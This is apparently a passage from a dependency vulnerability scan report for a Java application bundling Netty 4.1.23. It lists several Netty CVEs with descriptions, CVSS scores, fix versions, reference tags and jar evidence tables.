cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING,MITIGATION,VENDOR_ADVISORY cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PRESS/MEDIA_COVERAGE cve@mitre.org - ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,VENDOR_ADVISORY cve@mitre.org - ISSUE_TRACKING,VENDOR_ADVISORY cve@mitre.org - ISSUE_TRACKING,VENDOR_ADVISORY cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,PATCH,VENDOR_ADVISORY cve@mitre.org - MAILING_LIST,RELEASE_NOTES,VENDOR_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,VENDOR_ADVISORY cve@mitre.org - MAILING_LIST,VENDOR_ADVISORY cve@mitre.org - MITIGATION,PATCH,VENDOR_ADVISORY cve@mitre.org - MITIGATION,PATCH,VENDOR_ADVISORY cve@mitre.org - MITIGATION,VENDOR_ADVISORY cve@mitre.org - PATCH cve@mitre.org - PATCH cve@mitre.org - PATCH cve@mitre.org - PATCH,VENDOR_ADVISORY cve@mitre.org - PATCH,VENDOR_ADVISORY cve@mitre.org - PRESS/MEDIA_COVERAGE cve@mitre.org - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY cve@mitre.org - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY cve@mitre.org - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY cve@mitre.org - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY cve@mitre.org - PRODUCT cve@mitre.org - PRODUCT cve@mitre.org - PRODUCT,RELEASE_NOTES cve@mitre.org - PRODUCT,THIRD_PARTY_ADVISORY cve@mitre.org - RELEASE_NOTES cve@mitre.org - RELEASE_NOTES cve@mitre.org - RELEASE_NOTES,THIRD_PARTY_ADVISORY cve@mitre.org - RELEASE_NOTES,VENDOR_ADVISORY cve@mitre.org - TECHNICAL_DESCRIPTION,VENDOR_ADVISORY cve@mitre.org - TECHNICAL_DESCRIPTION,VENDOR_ADVISORY cve@mitre.org - TECHNICAL_DESCRIPTION,VENDOR_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY,US_GOVERNMENT_RESOURCE cve@mitre.org - THIRD_PARTY_ADVISORY,VENDOR_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY,VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2021-43797 suppress
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. Netty prior to version 4.1.71.Final skips control chars when they are present at the beginning / end of the header name. It should instead fail fast as these are not allowed by the spec and could lead to HTTP request smuggling. Failing to do the validation might cause netty to "sanitize" header names before it forward these to another remote system when used as proxy. This remote system can't see the invalid usage anymore, and therefore does not do the validation itself. Users should upgrade to version 4.1.71.Final. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2022-41915 (OSSINDEX) suppress
Netty project is an event-driven asynchronous network application framework. Starting in version 4.1.83.Final and prior to 4.1.86.Final, when calling `DefaultHttpHeadesr.set` with an _iterator_ of values, header value validation was not performed, allowing malicious header values in the iterator to perform HTTP Response Splitting. This issue has been patched in version 4.1.86.Final. Integrators can work around the issue by changing the `DefaultHttpHeaders.set(CharSequence, Iterator<?>)` call, into a `remove()` call, and call `add()` in a loop over the iterator of values.
Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2022-41915 for details CWE-113 Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:io.netty:netty-codec:4.1.23.Final:*:*:*:*:*:*:* CVE-2023-34462 suppress
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. The `SniHandler` can allocate up to 16MB of heap for each channel during the TLS handshake. When the handler or the channel does not have an idle timeout, it can be used to make a TCP server using the `SniHandler` to allocate 16MB of heap. The `SniHandler` class is a handler that waits for the TLS handshake to configure a `SslHandler` according to the indicated server name by the `ClientHello` record. For this matter it allocates a `ByteBuf` using the value defined in the `ClientHello` record. Normally the value of the packet should be smaller than the handshake packet but there are not checks done here and the way the code is written, it is possible to craft a packet that makes the `SslClientHelloHandler`. This vulnerability has been fixed in version 4.1.94.Final. CWE-400 Uncontrolled Resource Consumption, CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A References:
Vulnerable Software & Versions:
CVE-2021-21295 suppress
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.60.Final there is a vulnerability that enables request smuggling. If a Content-Length header is present in the original HTTP/2 request, the field is not validated by `Http2MultiplexHandler` as it is propagated up. This is fine as long as the request is not proxied through as HTTP/1.1. If the request comes in as an HTTP/2 stream, gets converted into the HTTP/1.1 domain objects (`HttpRequest`, `HttpContent`, etc.) via `Http2StreamFrameToHttpObjectCodec `and then sent up to the child channel's pipeline and proxied through a remote peer as HTTP/1.1 this may result in request smuggling. In a proxy case, users may assume the content-length is validated somehow, which is not the case. If the request is forwarded to a backend channel that is a HTTP/1.1 connection, the Content-Length now has meaning and needs to be checked. An attacker can smuggle requests inside the body as it gets downgraded from HTTP/2 to HTTP/1.1. For an example attack refer to the linked GitHub Advisory. Users are only affected if all of this is true: `HTTP2MultiplexCodec` or `Http2FrameCodec` is used, `Http2StreamFrameToHttpObjectCodec` is used to convert to HTTP/1.1 objects, and these HTTP/1.1 objects are forwarded to another remote peer. This has been patched in 4.1.60.Final As a workaround, the user can do the validation by themselves by implementing a custom `ChannelInboundHandler` that is put in the `ChannelPipeline` behind `Http2StreamFrameToHttpObjectCodec`. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: LOW (2.6) Vector: /AV:N/AC:H/Au:N/C:N/I:P/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2021-21409 suppress
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.61.Final there is a vulnerability that enables request smuggling. The content-length header is not correctly validated if the request only uses a single Http2HeaderFrame with the endStream set to to true. This could lead to request smuggling if the request is proxied to a remote peer and translated to HTTP/1.1. This is a followup of GHSA-wm47-8v5p-wjpj/CVE-2021-21295 which did miss to fix this one case. This was fixed as part of 4.1.61.Final. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2021-21290 suppress
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty before version 4.1.59.Final there is a vulnerability on Unix-like systems involving an insecure temp file. When netty's multipart decoders are used local information disclosure can occur via the local system temporary directory if temporary storing uploads on the disk is enabled. On unix-like systems, the temporary directory is shared between all user. As such, writing to this directory using APIs that do not explicitly set the file/directory permissions can lead to information disclosure. Of note, this does not impact modern MacOS Operating Systems. The method "File.createTempFile" on unix-like systems creates a random file, but, by default will create this file with the permissions "-rw-r--r--". Thus, if sensitive information is written to this file, other local users can read this information. This is the case in netty's "AbstractDiskHttpData" is vulnerable. This has been fixed in version 4.1.59.Final. As a workaround, one may specify your own "java.io.tmpdir" when you start the JVM or use "DefaultHttpDataFactory.setBaseDir(...)" to set the directory to something that is only readable by the current user. CWE-378 Creation of Temporary File With Insecure Permissions, CWE-379 Creation of Temporary File in Directory with Insecure Permissions, CWE-668 Exposure of Resource to Wrong Sphere
CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:1.8/RC:R/MAV:A CVSSv2:
Base Score: LOW (1.9) Vector: /AV:L/AC:M/Au:N/C:P/I:N/A:N References:
OSSINDEX - [CVE-2021-21290] CWE-378: Creation of Temporary File With Insecure Permissions OSSINDEX - [CVE-2021-21290] CWE-378: Creation of Temporary File With Insecure Permissions OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21290 OSSIndex - https://github.com/netty/netty/security/advisories/GHSA-5mcr-gq6c-3hq2 af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY security-advisories@github.com - EXPLOIT,THIRD_PARTY_ADVISORY security-advisories@github.com - MAILING_LIST,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2022-24823 suppress
Netty is an open-source, asynchronous event-driven network application framework. The package `io.netty:netty-codec-http` prior to version 4.1.77.Final contains an insufficient fix for CVE-2021-21290. When Netty's multipart decoders are used local information disclosure can occur via the local system temporary directory if temporary storing uploads on the disk is enabled. This only impacts applications running on Java version 6 and lower. Additionally, this vulnerability impacts code running on Unix-like systems, and very old versions of Mac OSX and Windows as they all share the system temporary directory between all users. Version 4.1.77.Final contains a patch for this vulnerability. As a workaround, specify one's own `java.io.tmpdir` when starting the JVM or use DefaultHttpDataFactory.setBaseDir(...) to set the directory to something that is only readable by the current user. CWE-378 Creation of Temporary File With Insecure Permissions, CWE-379 Creation of Temporary File in Directory with Insecure Permissions, CWE-668 Exposure of Resource to Wrong Sphere
CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:1.8/RC:R/MAV:A CVSSv2:
Base Score: LOW (1.9) Vector: /AV:L/AC:M/Au:N/C:P/I:N/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,MITIGATION,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,MITIGATION,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY security-advisories@github.com - EXPLOIT,MITIGATION,THIRD_PARTY_ADVISORY security-advisories@github.com - EXPLOIT,MITIGATION,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2025-25193 suppress
Netty, an asynchronous, event-driven network application framework, has a vulnerability in versions up to and including 4.1.118.Final. An unsafe reading of environment file could potentially cause a denial of service in Netty. When loaded on an Windows application, Netty attempts to load a file that does not exist. If an attacker creates such a large file, the Netty application crash. A similar issue was previously reported as CVE-2024-47535. This issue was fixed, but the fix was incomplete in that null-bytes were not counted against the input limit. Commit d1fbda62d3a47835d3fb35db8bd42ecc205a5386 contains an updated fix. CWE-400 Uncontrolled Resource Consumption
CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:1.8/RC:R/MAV:A References:
Vulnerable Software & Versions:
spring-music-sqldb-1.0.jar: netty-common-4.1.23.Final.jar (shaded: org.jctools:jctools-core:2.1.1)Description:
Java Concurrency Tools Core Library License:
Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/netty-common-4.1.23.Final.jar/META-INF/maven/org.jctools/jctools-core/pom.xml
MD5: d532029de01ef1c790266dea91b1ecdc
SHA1: f9571c65e428d21c795a34de2b217419dfc0e2f7
SHA256: db8f1cd5b23d38e3dcf7020d739e1c2f9559489051291d8a07095e62b8d7f750
Evidence Type Source Name Value Confidence Vendor pom artifactid jctools-core Low Vendor pom groupid org.jctools Highest Vendor pom name Java Concurrency Tools Core Library High Vendor pom url JCTools Highest Product pom artifactid jctools-core Highest Product pom groupid org.jctools Highest Product pom name Java Concurrency Tools Core Library High Product pom url JCTools High Version pom version 2.1.1 Highest
spring-music-sqldb-1.0.jar: netty-common-4.1.23.Final.jarDescription:
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers and clients. License:
http://www.apache.org/licenses/LICENSE-2.0 File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/netty-common-4.1.23.Final.jar
MD5: f00e1c8f82841ba33bcd7bd84f633f40
SHA1: 387b1b9d0441646a5cf84eace2b3e15dd07aca47
SHA256: 6ae4700a4571c11220ddab53492fd8eb806c1f8588e46ce12c5ae8668e4a858f
Evidence Type Source Name Value Confidence Vendor file name netty-common High Vendor jar package name io Highest Vendor jar package name netty Highest Vendor Manifest automatic-module-name io.netty.common Medium Vendor Manifest bundle-docurl http://netty.io/ Low Vendor Manifest bundle-symbolicname io.netty.common Medium Vendor Manifest implementation-url http://netty.io/netty-common/ Low Vendor Manifest Implementation-Vendor The Netty Project High Vendor Manifest Implementation-Vendor-Id io.netty Medium Vendor pom artifactid netty-common Low Vendor pom groupid io.netty Highest Vendor pom name Netty/Common High Vendor pom parent-artifactid netty-parent Low Product file name netty-common High Product jar package name io Highest Product jar package name netty Highest Product Manifest automatic-module-name io.netty.common Medium Product Manifest bundle-docurl http://netty.io/ Low Product Manifest Bundle-Name Netty/Common Medium Product Manifest bundle-symbolicname io.netty.common Medium Product Manifest Implementation-Title Netty/Common High Product Manifest implementation-url http://netty.io/netty-common/ Low Product pom artifactid netty-common Highest Product pom groupid io.netty Highest Product pom name Netty/Common High Product pom parent-artifactid netty-parent Medium Version Manifest Bundle-Version 4.1.23.Final High Version Manifest Implementation-Version 4.1.23.Final High Version pom version 4.1.23.Final Highest
CVE-2019-20444 suppress
HttpObjectDecoder.java in Netty before 4.1.44 allows an HTTP header that lacks a colon, which might be interpreted as a separate header with an incorrect syntax, or might be interpreted as an "invalid fold." CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3:
Base Score: CRITICAL (9.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.4) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2019-20445 suppress
HttpObjectDecoder.java in Netty before 4.1.44 allows a Content-Length header to be accompanied by a second Content-Length header, or by a Transfer-Encoding header. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3:
Base Score: CRITICAL (9.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.4) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,RELEASE_NOTES,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,RELEASE_NOTES,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2019-16869 suppress
Netty before 4.1.42.Final mishandles whitespace before the colon in HTTP headers (such as a "Transfer-Encoding : chunked" line), which leads to HTTP request smuggling. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - 